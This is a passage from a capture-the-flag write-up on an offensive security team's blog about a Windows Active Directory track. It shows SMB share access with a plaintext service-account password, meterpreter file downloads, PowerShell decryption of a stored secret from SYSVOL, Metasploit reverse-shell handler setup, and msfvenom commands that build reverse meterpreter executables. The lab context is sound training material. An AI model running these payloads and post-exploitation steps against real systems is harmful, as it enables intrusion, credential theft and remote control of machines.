C:\temp>net use \\files.nsresearch.ctf\users_data /user:NEUROSOFT\svcMoonCrackle Ryan1982
C:\temp>dir \\files.nsresearch.ctf\users_data
C:\temp>dir \\files.nsresearch.ctf\users_data\svcMoonCrackle
C:\temp>COPY \\files.nsresearch.ctf\users_data\svcMoonCrackle\ C:\temp\
C:\temp>net use \\files.nsresearch.ctf\users_data /delete
meterpreter > download C:\\temp\\
# from your Linux box
$ unzip
$ cat flag.txt

[Optional] Other flags


meterpreter > load powershell
meterpreter > powershell_shell
PS > cd \\neurosoft.ctf\SYSVOL
PS > ls
PS > ls neurosoft.ctf
PS > ls neurosoft.ctf\scripts
PS > cd neurosoft.ctf\scripts
PS > . .\Neuro_Script.ps1
PS > function Decrypt-String($key, $encryptedStringWithIV) { $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV); $IV = $bytes[0..15]; $aesManaged = Create-AesManagedObject $key $IV; $decryptor = $aesManaged.CreateDecryptor(); $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length — 16); $aesManaged.Dispose(); [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0); }$cipher = “zX9ZQCp0cjGpJbS+6DKVF6SxNyfXFIJS5fAUv5oGtVfAFAuGHBcR/vWjjQBmipiu8yaLH2CUDy2HPoJ5MfCrXA==”
$key = get-content ‘key.txt’
$backToPlainText = Decrypt-String $key $cipher


Could we pwn NSRESEARCH?

No. For many optional flags, we needed a place to store flags that would not be compromised once the participant gain Domain Admin rights.


The following section describes how we generated the payloads to test and solve the track. The player could succeed with publicly available post-exploitation frameworks such as Metasploit or Empire. In addition, it is worth mentioning that a few teams attempted the track with Cobalt strike.

Start reverse connection handler(s)

db_connect msf@msf
setg ExitOnSession false
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_ipv6_tcp
set LHOST ::
set LPORT 8080
run -j
sleep 2
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_ipv6_tcp
set LHOST ::
set LPORT 8081
run -j
sleep 2
use auxiliary/server/socks4a
run -j

Generate Payload

# Put the IP of shell.ctf
# Simple Exe (for first shell)
msfvenom -p windows/meterpreter/reverse_ipv6_tcp LHOST=”$my_ipv6" LPORT=8080 -f exe -o “payload_msf_x86.exe” -a x86
msfvenom -p windows/x64/meterpreter_reverse_ipv6_tcp LHOST=”$my_ipv6" LPORT=8081 -f exe -o “payload_msf_x64.exe” -a x64
# Service Exe (for priv esc)
msfvenom -p windows/meterpreter/reverse_ipv6_tcp LHOST=”$my_ipv6" LPORT=8080 -f exe-service -o “payload_msf_svc_x86.exe” -a x86
msfvenom -p windows/x64/meterpreter_reverse_ipv6_tcp LHOST=”$my_ipv6" LPORT=8081 -f exe-service -o “payload_msf_svc_x64.exe” -a x64 (did not have success with this one)

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Published in etticblog

ETTIC is the Offensive Security team at Desjardins. We specialize in Penetration Testing, Threat Modeling, Application Security, Offensive Proactive Research, Purple Teaming, and Adversary Simulation.

Martin Dubé
Martin Dubé

Written by Martin Dubé

Offensive Security Manager, Former Challenge Designer, Former CTF Team Lead @hackfestca and Security Enthusiast.

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